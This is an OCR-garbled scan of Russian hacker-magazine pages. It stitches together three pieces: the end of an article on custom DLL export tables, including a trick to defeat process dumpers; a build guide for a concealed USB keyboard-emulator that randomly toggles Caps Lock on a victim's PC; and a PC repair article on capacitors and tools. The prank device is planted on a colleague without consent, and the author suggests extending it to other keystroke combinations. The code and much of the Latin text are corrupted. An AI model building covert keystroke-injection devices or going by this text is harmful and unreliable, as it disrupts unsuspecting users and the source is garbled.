(поэтому дальше будем говорить только о своих собственных). Совсем неслож- 
но расположить в ОІ_І_специальный массив, хранящий указатели на все«вне- 
шние» функции в строго обозначенном порядке. Азатем экспортировать его, 
попутно сократив размер таблицы экспорта, поскольку указатель на массив 
окажется единственным экспортируемым элементом. При изменении версии 
0І_І_ адреса функций могут меняться, как и адрес массива указателей на них. 
Впрочем, нашу программу это не развал ит, так какадрес массива прописан в 
таблице экспорта, а указатели на функции — в нем самом: 



«Рукотворная» таблица экспорта. Лучше, чем у М ісгозоЛ? 

іпі: (Зопе ; 

__сіес1зрес (сіііехрогс ) ШОКБ Е_ДаЫе[2]; 

ВООЬ ѴШЯАРІ БІІМаіп (НІЫ5ТАМСЕ Ьз , ШОШЭ геазоп, 
ЬРѴОІБ ІрѵКез) 

{ 

і г (сіопе) геЪигп 1; (Зопе = 1; 

ОаЫе [ 0 ] = (ШОКВ)Гоо- (ШОІШ) Ьз; 

ОаЫе [1] = (ВМОКВ)Ьаг- (ВШКВ) Ьз; 

геСигп 1 ; 



Постой, но ведь... при этом мы фактически создадим свой собственный вари- 
анттаблицы экспорта. Чем он будет лучше уже существующего в реализации 
отМісгозоЙЗАтем, что в нашем массиве поиск экспортируемых функций не 
осуществляется. Вместо этого выполняется обращение по предопределен- 
ным индексам. Оверхид на вызов функций ничуть неувеличивается. Защи- 
щенность программы также остается на высоте (дизассемблер показывает 



ничего незначащие РѴА-адреса). Аединственным побочным эффектом 
становится невозможность удаления из массива уже существующих индексов 
(иначе нарушится их последовательность!). Добавлять новые функции (к 
концу массива) — можно, а вотудалять старые — нет. То есть, функции из 0І_І_ 
удалить, конечно, получится, но указатели из массива все-таки придется 
оставить, прописав там 0 (типа «неттакой функции») или воткнув указатель 
на функцию-пустышку (ничего не делающую, а только возвращающую код 
ошибки). 

Готовый пример содержится на диске в файлах Ъгіск-03-*, собранных в 
архив ѣгіскз-19Ь.7г. 

| . ^ ш— шшзд 

А .І Ппепылѵіпий вариант можно значительноулучшить, отказавшись 
отпроцедуры инициализации фактических адресов функций, складываю- 
щей НѴА-адрес каждой функции с базовым адресом загрузки динамической 
библиотеки: іоо = ($Еоо) ( (ІШШЗ) Еоо + (В9ЮІЮ) Ъ. ). И ведь все это в 
ран-тайме! Естественно, чем больше мы импортируем функций, тем дольше 
длится загрузка. 

К счастью, задел для оптимизации есть — и еще какой задел! Во-первых, 
динамическая библиотека инициализируетмассивфункций, вычитая (в 
ран-тайме) базовый адрес загрузки модуля из адреса каждой функции, что- 
бы получить РѴА-адрес. Затем его приходится преобразовывать в факти- 
ческий адрес функции, складывая (опять-таки в ран-тайме) ВѴАс базовым 
адресом загрузки модуля. Зачем нам делать двойную работу? Причина в 
том, что базовый адрес, прописанный в заголовке 0І_І_, является не более 
чем рекомендацией, и системный загрузчик может расположить библио- 
теку где-нибудь в другом месте, особенно, если выяснится, что диапазон 
адресов, на которых она претендует, уже кем-то занят. 

Учитывая, что все нормальные динамические библиотеки имеюттаблицу 
перемещаемых элементов (фиксапы) — благодаря чему могут быть переме- 
щены по любому свободному адресу — для самих себя мы можем сделать 
исключение. Убив таблицу перемещаемых элементов у исполняемого 
файла иОІ_І_ (ключ /РІХЕИ линкера М5 І_іпк), заставим систему грузить их 
по требуемому адресу, а не «куда хвост на душу положит». 

Главное, выбрать адреса загрузки так, чтобы не зацепить библиотеки 
ЫТБЬЬ . ОЬЬ и КЕШЕЬ32 . ОЬЬ, поскольку они проецируются на адресное 
пространство процесса еще до его создания и становятся неперемещае- 
мыми. Во всех системах, вплоть до Висты, эта парочка прижата к верхней 
границе пользовательского адресного пространства (2 Гб по умолчанию), 
так что волноваться не приходится. Но Виста с ее рандомизацией адресно- 
го пространства выбирает случайные адреса загрузки для всех системных 
библиотек, включая ЫТОЬЬ . ОЬЬ/КЕКЕЬ32 . БЬЬ. Как быть? Поковырявшись 
в ядре, мыщъх выяснил, что они ни при каких обстоятельствах не могут 
опускаться ниже отметки в 32 Мб. Следовательно, оперативный простор для 
загрузки своих 0І_І_у нас есть, а остальные — пускай подвинутся. 

При этом скорость загрузки возрастает во много раз, а программный код 
существенно упрощается (см. файлы ігіск-03-*)... но это ерунда. А вот 
если расположить динамическую библиотеку перед исполняемым файлом 
(в младших адресах) — это серьезно озадачит дамперы процессов, и все 
полученные дампы для непосредственного дизассемблирования окажутся 
непригодными. Кстати, оптимизация на этом не заканчивается, а только 
начинается !ЗЕ 
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і еоя оесит твои начальник или училка информатики г і юлагаю, ты многократ 

Г ИК ■ 4Ж — ОТТ 

но думал над тем, как бы похитрее прикольнуться над кем-нибудь из своих 

В ' ^НУѴ* ■ - >ѵ ’ ' . 

знакомых, работающих за компьютером. Боянистая тема с рабочим столом 



г же неинтересна. Но есть вариант более действенный и болезненный — при 



ко тором долго можно созерцать «жертву», пытающуюся х оть как-то и справить 
ситуацию.! 



Н КОНЦЕПЦИЯ 

- Итак, что же за хитроумное устройство мы будем ваять? По сути, эмулятор 
клавиатуры. Помнишь, в свое время я писал о снифере клавы —так вот, 
это будет обратный девайс. Все осложняется тем, что в разрыв клавиатуры 
устройство поставить достаточно сложно, поэтому мы будем использо- 
|вать самый распространенный на сегодняшний день интерфейс — 115В. 

I Благо, производители данного стандарта предусмотрели подключение к 
нему НЮ -устройств (НЮ — Нитап Іпіег^асе Оеѵісез — дословно можно 
перевести, как «устройства сопряжения с человеком»). Как известно, ком- 
пьютеру можно подключить громадное количество мышек и клавиатур, и 
конечный пользователь этого не заметит. Поскольку все лучшее придумано 
за нас, я начал рыскать на просторах инета в поисках инфы и наткнулся на 
весьма любопытный ресурс: ЬНр://тасеіесЬ.сот/Ыоа/пос1е/46 . где как 
Іраз и собрано такое устройство. Забегая вперед, скажу, что автор девайса 



мило умолчал про некоторые моменты и повторить действия по английской I 
версии утебя не выйдет. Но в статье я приподниму завесу тайны и расскажу! 
все тонкости создания этого устройства. Оно получится миниатюрным — в 
виде маленькой флешки — состоять будет из одного контроллера и мини- 
мума обвеса. И главной его задачей будет периодически, раз в несколько 
минут, активировать клавишу <Сарэ І_оск>. «Почему именно капслука?» 

— спросишьты. Отвечу: ты вполне можешь дописать в прошивку, напи- 
санную на языке Си, необходимые сканкоды некоторых клавиш или даже 
целые комбинации — например <АИ:-Р4>. Сами сканкоды можно почерп- 
нуть из моей статьи про логгер клавиатуры. 
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Про детали, необходимые к проекту, стоит сказать отдельно. Все упирается 
в твои навыки. Если ты великолепнс^зладеешь лазеру 
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Установленные Ризе-биты 




Аяз» 

логией, о которой мы тоже неоднократно писали, и прекрасно паяешь, то я 
тебе порекомендую сделать плату, как на том сайте, дабы получить макси- 
мальную миниатюрность. Однако никто не гарантирует работоспособности 
(поскольку все сделано не совсем по стандарту), и на некоторых компью- 
терах устройство может и не работать. Я решил идти по пути наименьшего 
сопротивления и наиболее быстрой сборки. Схему я несколько модифици- 
ровал, ознакомившисьс комментариями кстатье и посмотрев аналогичные 
схемы, которые работают более надежно. В общем, чтобы повторить мою 
реализациютебе понадобятся: 

1. Микроконтроллер АЬЬіпу 45 в БІР корпусе 

2. Панелька к нему (на 8 ножек) 

3 . Керамический чип конденсатор емкостью 0 , 1 мкФ и раз- 
мером 0805 



Компилятор Си 



Прикол 

с резистором 2,2 кОм 

Когда я собирал и тестировал устройство, обнаружил 
одну интересную особенность организма компьюте- 
ра. Если между первым и вторым контактом ТГ8В-разъ- 
ема поставить резистор в 2,2 кОм, то ѴѴішІоигя будет 
тщетно пытаться опознать устройство, нервируя 
сообщениями об ошибке. Это гораздо более безобид- 
ный, но в тоже время и более простой прикол. Есть 
несколько способов его реализации. Можно напа- 
ять резистор на разъем из старого провода. Либо, 
если имеется доступ к компьютеру, впаять прямо на 
контакты порта изнутри. Сообщение об ошибке будет 
жутко бесить, но программными средствами его ис- 
править будет нельзя. 



Хочу обратить твое внимание, что в данном проекте 
программа написана на языке высокого уровня §сс-с. 
Это бесплатный компилятор си для АѴК-микроконтрол- 
леров и множество энтузиастов используют его в своих 
поделках. Мы постоянно писали ранее программы 
только на ассемблере, но зачастую новичкам бывает 
очень сложно его освоить. Могутебя обрадовать: для 
наших контроллеров существует громадное множес- 
тво компиляторов. Только одних си-компиляторов, 
известных мне, существует три штуки. Правда, есть 
один существенный недостаток — у них различается 
синтаксис составления программ. Поэтому придется 
остановиться на каком-то одном и использовать его. 
Преимущество данного компилятора — его бесплат- 
ность. Также существуют компиляторы Паскаля и даже 
ВАІ8ІС, но последний я тебе крайне не рекомендую. Он 
генерирует жуткий код,которыйпортитвсе.К тому же, 
последние компиляторы платные (хотя и позволяют 
писать в тестовом режиме программу до двух килобайт, 
которой, как правило, бывает достаточно). 
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Собранное устройство, вид с двух сторон 



7 . Желательно стабилитрон на 3,6 вольта (я брал в 
ЗМБ-корпусе, для миниатюрности) 

8. БЗВ-разъем на плату или старая сгоревшая флешка, 
откуда его можно выпаять 

9 . Нормальный программатор , но вполне можно обойтись 
пятью проводками на ЬРТ-порт 



Еслиты неуверен в своихсилах илитвои руки дрожат от спиртного в крови, 
можно использовать и выводные резисторы мощностью 0,125 ват, нотогда 
наш чудо-девайс выйдетуж слишком громоздким и брутальным, поэтому 
я порекомендовал бы потренироваться в пайке 5Мй-компонентов. Стаби- 
литроны желательны — без них, конечно, будет работать, но работа будет 
зависеть от фазы луны, пятен на солнце и станет весьма нестабильной. 
Еслиты очень крутой, то можешь отказаться и от резисторов в 68 Ом, а 
вместо резистора на 2,2 кОм поставить на полтора. Однако тут велик риск, 
что работать ничего не будет. На деле, из всего перечисленного тебе нужно 
купить только микроконтроллер. Резисторы, хоть и выводные, можно найти 
в старой ІІБВ-клавиатуре, и пусть тебя не смущаеттотфакт, что номиналы 
их могут отличаться отзаявленных мною в два раза. Например, мне попа- 
лись резисторы вместо 68 Ом — 32 Ома и вместо 2,2 — 1 ,5 кОм. Производи- 
тели клавиатур тоже не всегда блюдут стандарты. Для монтирования всей 
схемы тебе понадобится провод. Кстати, идеально подходит моя любимая 
витая пара. 

Из инструмента тебе, естественно, потребуется паяльник, пинцеты для 
резисторов, флюс-гель, ножницы по металлу и обычная зажигалка. 



^ РЕАЛИЗАЦИЯ 

Ну-с, перейдем от слов кделу. Для начала мы отпаяем разъем 115В от 
старой флешки. Это можно сделать с помощью промышленного фена или 
газового паяльника, но за неимением оных подойдет и обычная зажи- 
галка. Аккуратно держим флешку плоскогубцами и греем ее пламенем 
зажигалки с двух сторон. Лично я держал прямо в огне. Только нужно быть 
внимательным, чтобы в самом разъеме флешки не потекла пластмасса. 
Кактолько припой расплавится, легким встряхиванием отделяем плату 



4 . 0805 чип резистор сопротивлением 2,2 кОм 

5 . Два резистора по 68 Ом такого же размера 

6 . Двухсторонняя монтажная плата с отверстиями шагом 
2 , 4 мм 



Подпаянный проводдля программирования 
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флешки от разъема. После прикидываем расположение деталей на нашей 
макетной плате. Берем ножницы по металлу и легко, прямо по дырочкам, 
вырезаем нужный кусок. У меня он получился размером примерно 18x35 
мм. Подлине — оказалось с избытком. Но мельчить я тоже не рекомендую, 
особенно если паяльникберешь в первый раз. Теперь разгибаем широкие 
края разъема, чтобы они не мешали лечь ему прямо на плату, и запаиваем 
все четыре контакта на каждую дырочку макетки. Возможно, придется 
снизу напильником подпилить пластмассовые выступающие части. Думаю, 
ты сам догадаешься, какие. Затем заливаем широкие контакты припоем 
и получаем плату, уже очень похожую на разобранную флешку. После этой 
процедуры впаиваем панельку под наш микроконтроллер. В принципе, 
можно пожмотиться и впаять сразу контроллер. Но в случае неудачной 
прошивки его придется выпаивать заново. Да и какоказалось, гораздо 
проще собрать отдельный программатор, чем каждый раз припаиваться 
к микросхеме. Обрати внимание, как расположится контроллер. Его ключ 
(обычно обозначен точкой или выемкой), который показывает нахожде- 
ние первой ножки, направлен в противоположную сторону относительно 
разъема 1)5В. Нумерация выводов микросхемы, если смотреть сверху, 
начинается от ключа и идет против часовой стрелки. Вообще, такие вещи 
лучше всегда уточнять в мануалах на микросхему. 

Резистор на 2,2 кОм впаивается между первой и второй ножкой разъема. 

Уже после впайки этого резистора, если воткнуть платку в комп, Винда 
будеттщетно пытаться определить, что же за устройство ей хотят скормить. 
Дальше идем по схеме, впаиваем резисторы 68 Ом и заводим их на 5 и 7 
ножки контроллера и, соответственно, на 2 и 3 пины разъема. Конденсатор 
будету нас фильтровать высокочастотные помехи по питанию, — я его 
поставил с противоположной стороны платы между 4 и 8 ногой контролле- 
ра. Эти контакты заводим на пины разъема ЮСБ 1 (+5 вольт) и 4 (общий). 
Теперь стабилитроны. Какя говорил выше, их наличие необязательно, 
но лучше следовать стандартам, дабы избежать неприятных косяков. 
Документацию на конкретный тип стабилитрона, ты найдешь в интернете. 
Еще раз пробегись внимательно по плате, не пожалей времени, рекомен- 
дую даже прозвонить мультиметром. Нужно убрать все «сопли» и сделать 
плату конфеткой. Если ты на 100%уверен, что схема собрана правильного 



перейдем ксамой интересной процедуре, которая, как выяснилось, таила 
много подвохов — прошивке микроконтроллера. 

г НАЛАДКА И ПРОШИВКА 

Теперь ты владелец собранного устройства, которое уже выглядит нор- 
мальным девайсом, но, по правде, является всего лишь бесполезной бол- 
ванкой, поскольку ничего пока не делает. А работать оно будетлишь после 
того, как мы зальем в него свою прошивку. Есть несколько способов. Мы 
уже неоднократно писали про БРТ-порти возвращаться к этому варианту 
не будем. Это будеттвоим домашним заданием — разобраться и прошить 
данный контроллер. Подсказка: надо прочитать хелп на программатор, 
который я выложу на диск, и документацию на контроллер, которую ты 
найдешьтам же. 

Теперь рассмотрим несколько других способов. Первый, самый простой 
и глупый — найти, где могут прошить контроллеры, например, в радиома- 
газине. Преимущество — тебе не придется прилагать никакихусилий по 
пайке программатора, покупке итому подобное. Но есть и существенный 
недостаток. Если тебе там что-то прошьют не так, придется снова переться 
вэту конторуи прошиватьзаново. Какправило, вэлектронике косякне 
ясен сразу, может, ты ошибся в схемотехнике, что-то не пропаял, а может, 
прошивка неверно работает. По этому вполне возможно, что ты доско- 
нально выучишь дорогу в эту фирмочку, нотак и не получишь готового 
устройства, а денег на прошивку потратишь больше, чем на нормальный 
программатор. Второй вариант— это позаимствовать программатору 
товарища. В свое время я брал погонять параллельный программатор на 
старой работе. Но все, что взято в долг, надо возвращать, поэтому вариант 
хоть и красивый, но, опять же, не оченьудачный. Самый простой и верный 
способ — иметь свой программатор на 115В. Такой можно купить специаль- 
но для АѴН-микроконтроллеров у разных контор, которые могут его выслать 
даже в глубинку России, вместе с контроллером. Надо отметить, что внут- 
рисхемные программаторы для АѴР стояточень дешево, около $30-40, что 
по карману даже школьнику. 

Ну, будем считать, что программатор у тебя на руках; самодельный на 
БРТ-порт или же профессиональный параллельный программатор для 
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• Исходный проект, 
на основе которого 
написана эта статья, 
находится тут: Ы:1р :// 
тасе1:есИ.сопп/Ыод/ 
посІе/46 

• Ресурс, посвя- 
щенный програм- 
мированию мик- 
роконтроллеров и 
программированию 
их через І_РТ-порт: 
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На диске ты найдешь 
документацию к кон- 
троллеру, програм- 
му-программатор, 
исходный и скомпи- 
лированный код, ком- 
пиляторы ассемблера 
и си. 



уймы микросхем — неважно. Теперь приступим к главному 

— прошивке микроконтроллера. Как я уже говорил выше, 
автор оригинального проекта упустил из внимания де- 
тальное рассмотрение данного процесса, и если почитать 
комментарии, многиетак в нем и не разобрались. Итак, я 
буду рассматривать вариант, что программатор ты заполучил 

— последовательный внутрисхемный или на І_РТ-порт. Хочу 
отметить, при программировании самодельным программа- 
тором на параллельный порттебе придется подать питание на 
наш контроллер, чтобы его прошить. Самый простой способ 

— взять его из этого же компьютера, например с провода бло- 
ка питания флоповода. Красный проводу нас будет +5 вольт, 

а черный или корпус компьютера — «земля». Поначалу я 
просто подпаял линии программирования контроллера прямо 
в схему. Но после прошивки я отпаял все провода, а девайс 
не зафурычил. Несколько раз повторять процедуру запайки- 
распайки, рискуя ошибиться, мне было лень. Поэтому я быс- 
тренько соорудил небольшую плату с ЭІР-панелькой. Затем 
вставил туда АШпу45 и разъем программатора и прошивал 
его уже там, перетыкая контроллер из нашей платы в плату 
программатора. 

Процедуры выполнены? Тогда запускаем программу 
программатора и читаем сигнатуру контроллера. Если 
контроллер нормально определился, то все ОК. Если нет, 
значит, ты где-то накосячил. Есть шанс, что контроллер 
попался битый, но сетовать на это следует в последнюю оче- 
редь. После определения контроллера выбираем, что хотим 
прошить Ріазб-память контроллера — и выбираем наш файл 
прошивки сарзіоскег.бех. Перед прошивкой, даже если наша 
тинька новенькая, ее надо стереть. Для этого в софте обычно 
есть специальная кнопка — «стереть контроллер». Сверяем 
прошитый контроллер с исходником: если все хорошо, то 
прошивка прошла успешно. Ріо неторопись вставлять девайс 
в компьютер. Работать он не будет, так как надо сделать еще 



одну вещь. Практически у всех микроконтроллеров, сущест- 
вующих сегодня на рынке, независимо к какому семейству 
они принадлежат, имеются так называемые установочные 
биты — {изе-Ьііз. Это святая святых контроллера. У меня уже 
лежит пригоршня контроллеров, которую я загубил зверскими 
экспериментами с ІЛзе-битами. РІастроечные биты отвечают 
за ряд основных параметров контроллера. Одними можно 
указать, на какой частоте будет работать наше устройство, 
вывести его на максимальную частоту или даже заставить 
работать на частоте нескольких килогерц. РІадо понимать, что 
в схемотехнике быстрее не значит лучше. Как правило, опре- 
деленная частота работы нужна при сопряжении с некоторы- 
ми интерфейсами для выдерживания длительности сигналов. 
Таким интерфейсом можетявляться многократно описанный 
интерфейс ІІАНТ, более известный как Н5-232. РІеправильная 
установка параметров Іизе-битов может привести ктому, что 
больше нельзя будет работать с данным контроллером в этой 
схеме и, возможно, придется делать отдельную схему для пе- 
репрошивки установоклибо искать параллельный програм- 
матор. Есть еще іъзе-биты, которые зашивают на заводе, если 
устройство пускают в серию и не хотят чтобы оттуда могли 
выдрать прошивку. Они называются биты защиты и однократ- 
но программируются. Физически они представляютсобой 
перемычки внутри кристалла, которые пережигаются, и уже 
нет никакой возможности штатно достать прошивку контрол- 
лера. Эти фьюзы лучше нетрогать, если не хочешь получить 
неработающий контроллер без возможности восстановления. 
Наше устройство необходимо вывести на максимальную 
частоту работы (к слову сказать, на западном ресурсе этот 
моментбыл совершенноупущен из виду). Лезем в настройки 
{иве-битов проекта и выставляем фьюзы в нужной комби- 
нации. Нетрогай лишнего! Никогда недоверяй материалам 
поустановке фьюзов, всегда лезь в мануал и проверяй сам, 
верно ли они установлены (можешьтакже проверить меня). 
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> ѵѵагпіпд 

Учти, что если твои 
действия с этим 
устройством повлекут 
тяжелые последствия, 
то тебя вполне могут 
осудить по 274 статье 
уголовного кодекса. 



разогрев его в маленькой форме из фольги или жести. Я 
поступил проще: взял термоусадку, в которую входило мое 
устройство, иусадил ее прямо сверху на плату обычной зажи- 
галкой. Вышло круто и быстро. Цветтермоусадки я подобрал 
темный, чтобы на фоне современных корпусов оно как можно 
меньше бросалось в глаза. На этом этапе можно поставить 
жирную точку— наш фрикерский девайс собран и работает. 



г итог 

После небольшого геморроя с устройством я решил его 
протестировать на своем коллеге. Надо сказать, что подолгу 
службы он постоянно набирает большие объемы текста. Пока 
коллега ходил на обед, я поставил девайс ему в ІІ5В-порт. 
Первые полчаса товарищ думал, что случайно задевает 
кнопку <Сарз І_оск>. Затем понял: что-то тут не чисто. 
Потребовал от админа заменить ему клавиатуру. Админ счел 
девайс обыкновенной флешкой и сердобольно заменил 
клаву. Но проблемы не прекратились. В конце концов, това- 
рищ начал требовать переставить операционную систему 
или даже сменить компьютер. Под конец рабочего дня я от 
смеха-таки прокололся, в чем дело. Шутка удалась, хожу 
в синяках. Проще говоря, потратив один день на детали и 
сборку, ты можешь получить весьма веселенькое устройс- 
тво, которым можно неплохо позабавиться. А если ты еще 
и разберешься с кодом, который, напоминаю, написан на 
языке Си и компилятор к которому я любезно выложил на 
диск, ты можешь дописать дополнительные кнопки и комби- 
нации. Отмечу, что сначала инсталлируй АѴВ Зііісііо, а потом 
компилятор ѴѴіп АѴР, и он прекрасно сроднится со студией. 

В результате ты сможешь в одной программе писать как 
на си, так и на ассемблере. В общем, удачи! Ипишимнео 
результатах сборки. □с 



Отпаиваем зажигалкой У5В- 



Итак, нам нужно программировать биты, отвечающие за 
частоту процессора. А именно: установить СК5ЕІ_0 в единицу, 
а остальные СК5ЕІ_1 - СК5ЕІ_3 в ноль. Помимо этого, надо 
установить биты 51ІТ0 в единицу, а 51ІТ1 в ноль. Проверьуста- 
новку бита СК0ІѴ8, чтобы он тоже был установлен в единицу. 
Вышеперечисленные биты устанавливают режим работы 
процессора: выставляют работу на максимально возможной 
частоте 1 6 МГц, без внешнего резонатора. Последний бит 
показывает, делить ли данную частоту на 8. Если он будет 
установлен в ноль, то процессор будет работать на частоте 
16/8=2 МГц! не есть гуд). Почему я такое пристальное внима- 
ние уделил последнему биту? Устройство у меня не работало 
несколько дней, и я не могпонять, в чемже дело. Оказалось, 
что по умолчанию данный битустановлен, и только после его 
снятия все завелось. 



^ ТЕСТИРОВАНИЕ И ИСПОЛЬЗОВАНИЕ 

Я надеюсь, ты осилил рассмотренные этапы, собрал и прошил 
наше замечательное фрикерское устройство. Теперь протес- 
тируем его работоспособность. 

Пихаем нашдевайс в 1)5В-порт компьютера. Устройство оп- 
ределяется как НЮ, и операционка нормальноустанавливает 
штатные драйвера. Можно для пущей уверенности посмот- 
реть его в диспетчере устройств. Отлично, к работе готовы! Во 
время тестирования меня несколько раз обозвали блондин- 
кой, таккакя периодически начинал печататьс включенным 
сСарв І_оск>. 

Далееты можешь оформить устройство, чтобы оно приняло 
нормальный человеческий вид (а не образину брутальной 
платы). Ориентируйся на собственный вкус. Как вариант, 
можно залить плату в какой-нибудь форме эпоксидной смо- 
лой, получив весьма гламурную «флешку». Либотермоклеем, 



ХАКЕР 06 /114/ 08 



► 107 




рЬгеакігід 




ошибке сборщиком в РСІ-слот 



^ МЕЛОЧИ, НЕСОВМЕСТИМЫЕ С ЖИЗНЬЮ 

Наиболее частыми проявлениями излишней ретивости новоиспеченного 
сборщика компьютеров являются снесенные напрочь разнообразные мел- 
кие элементы. Иногда складывается впечатление, что сборщик страдает 
синдромом Паркинсона и практически не контролирует движений отверт- 
ки. Ното, что один человек сломал, другой почти всегда может починить. 
Первое и основное правило при ремонте любого компонента — вниматель- 
ность и острый глаз. Никуда не спеши, осматривай пациента тщательно и 
методично. Особое вниманиеуделяй мелочам, наиболее подверженным 
«криворукой угрозе». Например, местам крепежа защелок крепления 
радиатора процессора, участкам возле крепежных отверстий для винтов, 
группам контактов для присоединения кнопок и светодиодов передней 
панели корпуса. Нелишним будет проверить состояние разъемов для 
модулей памяти и окружающих их компонентов. У видеокарт чаще всего 
страдают мелкие БМй-конденсаторы и резисторы, расположенные неда- 
леко от разъема РСІ ехргезз. 

Что мы ищем? Любые отклонения от нормы, будьто сколы, почернение, 
вздутие конденсаторов, следы перегрева или царапины. Если «кримина- 



ла» на лицевой стороне не обнаружено, это не значит, что его нет на тыль- 
ной. Еще одно место, любимое «ломастерами», — резисторные сборки, 
терминирующие сигнальные линии памяти. 

По ходу обследования пациента не забывай присматриваться ктокопро- 
водящим дорожкам печатного монтажа, они страдают ничуть не реже чем 
БМИ-шки. Если «раны» обнаружены, приступаем к ремонтному этапу. Если 
нет — читаем дальше. 

Н КОНДЕНСАТОРЫ «В ПОЛОЖЕНИИ» 

Прочитав название заметки, половина читателей выкрикнут«Бояааан!» 
и будут правы. История с конденсаторами началась в эпоху Біо! 1 и Боскеі 
370 по причине излишней любви фирмы АЬИ: экономить. Упоминания о 
вздувшихся конденсаторах встречались и раньше, но вот массовость 
напасть приобрела только с подачи упомянутой конторы. 

В чем причина «вздуваемости» конденсаторов? Кроме емкости и рабочего 
напряжения у них есть еще один важный (хоть и сложнопроизноси- 
мый] параметр — «эквивалентное последовательное сопротивление» 
(едиіѵаіепі зегіез гезізіапсе — Е5Р]. Зависитоно от сопротивления 
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материала обкладок и потерь в диэлектрике. А что такое «потери в диэ- 
лектрике»? Это тепло, разогревающее конденсатор и способное неплохо 
вскипятить электролит. Особенно проявляется влияние высокого Е5К при 
использовании конденсаторов в импульсных цепях, коими и являются 
цепи питания процессора, памяти и стабилизаторы питания видеокарт. 
Присматриваться (или сразу заменить, без рассматривания) надо к конден- 
саторам производства І_іСоп, 6-І_ихоп (их метко окрестили «Глюксонами»), 
6.5.С., Таісоп, ^скоп, Сбзі, ТауеЬ, СЬоуо... — список «горе-брендов» на этом 
не заканчивается, смею заверить. 

Я бы не рекомендовал оставлять замеченные вздувшиеся конденсаторы 
без внимания, так как кроме ухудшения параметров разогрева может 
произойти еще и замыкание между обкладками. Которое, в свою очередь, 
может стоить жизни всему стабилизатору питания процессора. 

Причиной вздувания конденсаторов бываети не обеспечивающий долж- 
ных выходных параметров блок питания. Потому всякие Собедеп, ЛЧС и 
прочие Соіогбіі-ы стройными рядами идут на свалку. 

^ ОТШИБЛЕННАЯ ПАМЯТЬ 

Такуж получается, что переченьтипичных неисправностей постепенно 
превращается в списоктем: «А где мы еще могли лохануться при сборке 
компьютера?». Подсказываю — подсистема памяти. Все, что связано с 
памятью, пользуется особой любовьюу начинающихапгрейдеров. Можно 
долго и со вкусом живописать, как впихнутый в современную плату модуль 
«обычной» ООП замыкает контакты питания, и они постепенно начинают 
испускать предсмертную вонь. Но чем думаетчеловек, который методичес- 
ки ты ка ет УЖЕ с ожже н н ы й м одул ь в сл е ду ю щи й слот памяти, дожида ется 
его выгорания и повторяетоперацию? Скажешь, так не бывает? Еще как 
бывает, смотри фото. Но чаще всего встречается другая ситуация — не до 
конца вставленный модуль памяти. Как вариант— вставленный другой 
стороной (человеческая фантазия беспредельна). События развива- 
ются быстро, и буквально через секунду-вторую есть шансы лицезреть 
выгоревшие контакты. Кажется, тебя насторожила фраза «установленный 
задом наперед»? Как показала практика, ситуация, когда клиенты приносят 
выгнутую плату, в которую нечеловеческими усилиями втиснута намертво 
приварившаяся к контактам планка памяти, нетакуж и редка. 

^ ПОКАЖИ МНЕ СВОИ ИНСТРУМЕНТЫ, И Я СКАЖУ, КТО ТЫ 

Чтобы попытаться что-то отремонтировать, одной отвертки и маминых ма- 
никюрных ножництебе может и не хватить. Ксчастью, необходимые инстру- 
менты относительно недороги да к тому же дефицитностью не отличаются. 
Подразумевается, что отвертки, кусачки, гаечные ключи тебе знакомы. 



Кто есть кто? 

Цифрами обозначены: 

1 — большинство трехвыводных компонентов — тран- 
зисторы. Хотя в подобном корпусе попадаются и диоды 
или стабилитроны. Определить, что именно попало в 
поле твоего зрения можно, расшифровав код, который 
наносится на верхнюю грань. Помочь в этом нелегком 
деле может, к примеру, ресурс ЬИр: /Л/ѵѵѵлу.ікЬ-ди.сот / 
сосіе/ятсісосіе/іпсіехктсісосіе.ріір . 

2 — кварцевый резонатор в металлическом корпусе. 

3 — керамический конденсатор. Обычно они не марки- 
руются, замена подбирается по габаритам корпуса. 

4 — электролитический конденсатор, приспособлен- 
ный для поверхностного монтажа. 

5 — резисторная сборка. Как правило, состоит из четы- 
рех резисторов в общем корпусе. Маркируется тремя 
цифрами: первые две обозначают сопротивление в 
Омах, третья — множитель, то бишь количество нулей, 
которые надо дописать к значению сопротивления. 

6 — конденсаторная сборка. Четыре керамических кон- 
денсатора в одном корпусе. 

7 — одиночный резистор. Маркируется также, как 
сборка. 




ПН 0 -компоненты, которыеты можешь встретить на плате чаще всего 
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Типичный пример «снесенных» элементов. Цифрой 1 обозначено место расположения РОЗТ-карта ІС Воок 1080 
ЗМО-индуктивности, пострадавшей при монтаже платы в корпус, цифрой 2 — свидетель- 
ство попытки припаять конденсатор 




> Ііпкз 

• Шр://сІідсЫр.сот/ 

— один из лучших 
ресурсов, призван- 
ных помочь в поиске 
даташитов и подборе 
аналогов радиоэлек- 
тронных компонен- 
тов. Настоятельно 
рекомендую! 

• Ьир://ісЬоок.сот. 
иа/розі/іпсІех.ЫтІ. 

— сайтфирмы-про- 
изводителя 1080. Там 
можно найти деталь- 
ную расшифровку 
всех РОЗТ-кодов и по- 
читать про специфику 
работы РОЗТ-картна 
материнских платах 
некоторых произво- 
дителей. 



Итак, инструмент под номером 1 — зонд. Идеально подходит, 
чтобы вынуть батарейку подпитки СМ05 из гнезда, подогнуть 
выводы, контакты, подвинуть массивную деталь во время 
пайки. Металлическая щеточка поможет очистить плату от 
последствий выгорания компонентов. 

Следующим идет атрибут классических фильмов ужасов — 
скальпель. Областей применения не счесть. Зачистка кон- 
тактов, подрезка печатных дорожек, укорачивание выводов, 
удаление компонентов. Показанный на фото скальпель имеет 
сменные лезвия и удобную тяжелую ручку. Рекомендую! 

А вот пинцеты несколько отличаются от тех, которые ты при- 
выквидеть. Для работы с крошечными ЗМО-компонентами и 
инструмент требуется соответствующий. Впрочем, привыкнув 
работать тон ким и специализированными пинцетами, брать в 
руки их бытовых собратьев не сильно хочется. 

Инструмент под номером 4 — угловой ЗМй-пинцет. Его удобно 
использовать в труднодоступных местах, куда прямым не 
подлезешь. Еще он может оказаться полезен при извлече- 
нии винтов из глубоких отверстий, к примеру, при разборке 
ноутбуков. 

Пинцеты под номерами 4 и 5 — прямые. Отличие инструмента 
под номером 5 состоитвтом, что он имееттермоизоляцию 
(зеленое покрытие]. Оно очень помогает при термовоздушной 
пайке, когда инструмент неизбежно нагревается. 

И вот мы вплотную подошли к главным инструментам 
— паяльникам и паяльному оборудованию. Скажусразу: 
не всегда для ремонта ненаглядной престарелой АЗІІ5 
Р4Р800 есть смысл покупать оборудование на двести-трис- 
та долларов. Но подобное оборудование есть практически 
во всех мастерских по ремонту мобильныхтелефонов. За 
небольшую плату их работники вряд ли откажутся выпаять 
один-два «жука». Поэтому необходимо хотя бы знать, как 
выглядит нужноетебе оборудование. Самое распростра- 



$]ѴГО-компоненты 

